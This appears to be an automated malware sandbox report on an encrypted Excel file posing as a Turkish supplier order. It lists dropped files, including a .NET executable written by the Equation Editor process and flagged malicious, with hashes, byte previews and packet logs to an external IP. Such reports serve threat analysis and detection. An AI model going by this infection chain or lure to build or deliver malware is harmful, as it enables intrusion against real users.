    Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):5396
    Entropy (8bit):7.915293088075047
    Encrypted:false
    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
    Malicious:false
    Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
    Category:dropped
    Size (bytes):4396
    Entropy (8bit):7.884233298494423
    Encrypted:false
    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
    Malicious:false
    Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):10202
    Entropy (8bit):7.870143202588524
    Encrypted:false
    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
    MD5:66EF10508ED9AE9871D59F267FBE15AA
    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
    Malicious:false
    Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):11303
    Entropy (8bit):7.909402464702408
    Encrypted:false
    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
    Malicious:false
    Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):2647
    Entropy (8bit):7.8900124483490135
    Encrypted:false
    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5:E46357D82EBC866EEBDA98FA8F94B385
    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious:false
    Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):11303
    Entropy (8bit):7.909402464702408
    Encrypted:false
    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
    Malicious:false
    Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:CDFV2 Encrypted
    Category:dropped
    Size (bytes):188488
    Entropy (8bit):7.9577593900244965
    Encrypted:false
    SSDEEP:3072:6EmIit1DhLZAdQFZ7/a96EBEiE694tQDBbZuVqXx4N6KKbq0tTnZEaxwjsaHALv0:Jgt1dLZAY0bBEi3iQ9NcqXxGuV2HHw0
    MD5:650BB8E5FE570BDE782BE21C4E9F421C
    SHA1:FD3FFA031546F1DFA7ED884689CA1E85941FCA1E
    SHA-256:247838308FB5E12A258DEF82A63E3A752D1536D1771539D63CEBCF283B8154B5
    SHA-512:B288B2BFF546A427C6C683879F4AA17F60C794B8A0DF3ABFEA37451490C7F737A5BA5460FAB91E09CEA69A0E6DBF6DFF7CA65206369E7E8E19AB2058B7342CC7
    Malicious:false
    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):165
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
    MD5:797869BB881CFBCDAC2064F92B26E46F
    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
    Malicious:true
    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Category:dropped
    Size (bytes):229376
    Entropy (8bit):7.903722597215708
    Encrypted:false
    SSDEEP:3072:AZZ8kwSCcwugf3DaUrpXtKY/c3QSXCjE/jIgQW9BPnXKWIhmpCCBHhGThql:mCugfz/5t//sTXC2b3rPXahqC
    MD5:CE42FE431B88922AB59B6FD880CADCF6
    SHA1:652914D960DA1D37D270DB7F6E3B07C9D4B0E3A9
    SHA-256:4D8CC87942499042195CEC4FDB2FC5869D4BF98A1D827FD30FB74E82CF0FDC0F
    SHA-512:62B30A77CB2EF3491ABB3EC517CA966C4A9EAFA0F263118BA817A4CE87F8D3CDDC014BCE25FF268435B7F69605E6C14B8031B482F7CAF00E855964C618C609BA
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 41%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~b.................v...|.......... ........@.. ....................................`.................................p...W....................................P............................................... ............... ..H............text....u... ...v.................. ..`.reloc...............x..............@..B.rsrc................z..............@..@........................H........P...D...........=..............................................".(.....*....0...........(>...*..0..6.......+.&.(.....(.....(....:.....E.........-......&&..(.... y...(....%& ~...(....%&(.... ....(.... ....(....(.... ....(.... ....(....(.... ....(.... ....(....%&(.... ....(....%& ....(....(.......(....(....:.....E........&..(......(....9....&.(.......(....(....%&:.....E........&...(.......(........(....%&(....&. (....8.....$(....(....%.((.......%.,(....~?....%.0(......
    File type:CDFV2 Encrypted
    Entropy (8bit):7.9577593900244965
    TrID:
    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
    File name:TedarikciSiparisi_83613 .xlsx
    File size:188488
    MD5:650bb8e5fe570bde782be21c4e9f421c
    SHA1:fd3ffa031546f1dfa7ed884689ca1e85941fca1e
    SHA256:247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
    SHA512:b288b2bff546a427c6c683879f4aa17f60c794b8a0df3abfea37451490c7f737a5ba5460fab91e09cea69a0e6dbf6dff7ca65206369e7e8e19ab2058b7342cc7
    SSDEEP:3072:6EmIit1DhLZAdQFZ7/a96EBEiE694tQDBbZuVqXx4N6KKbq0tTnZEaxwjsaHALv0:Jgt1dLZAY0bBEi3iQ9NcqXxGuV2HHw0
    TLSH:0B041267B487283DF61262390A8B5493C52C9FCB88BBD16A468CBD75F77CE6050B243D
    File Content Preview:........................>......................................................................................................................................................................................................................................
    Icon Hash:e4e2aa8aa4b4bcb4
    TimestampSource PortDest PortSource IPDest IP
    May 14, 2022 15:14:12.248838902 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.467067957 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.467297077 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.468460083 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.687846899 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.687892914 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.687918901 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.687942028 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.688054085 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.692761898 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.906400919 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906440020 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906470060 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906497955 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906524897 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906553984 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906555891 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.906588078 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.906590939 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.906594038 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.910749912 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.910798073 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.910878897 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.910897017 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124620914 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124664068 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124681950 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124692917 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124703884 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124722958 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124732018 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124754906 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124763966 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124785900 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124799013 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124815941 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124823093 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124842882 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124852896 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124872923 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124880075 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124902964 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124911070 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124931097 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124939919 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124960899 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124968052 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124998093 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.126954079 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.128725052 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.128786087 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.128842115 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.128844976 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.128849983 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.128881931 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.128887892 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.128926039 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.342945099 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343007088 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343050957 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343091011 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343121052 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343125105 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343126059 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343163967 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343167067 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343202114 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343209028 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343250990 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343255043 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343287945 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343291998 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343332052 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343333960 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343372107 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343373060 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343411922 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343414068 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343451977 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343453884 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343493938 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343493938 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343529940 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343534946 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343569994 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343575001 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343612909 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343616009 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343653917 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343658924 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343696117 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343698025 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343735933 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343739986 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343776941 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343785048 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343822956 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343825102 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343863010 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343864918 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343902111 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343905926 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343940973 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343945980 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343987942 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.346565962 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.346611977 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.346652985 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.346669912 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.346694946 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.346695900 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.346700907 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.346731901 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.346736908 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.346776962 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.346779108 CEST8049171180.214.238.224192.168.2.22
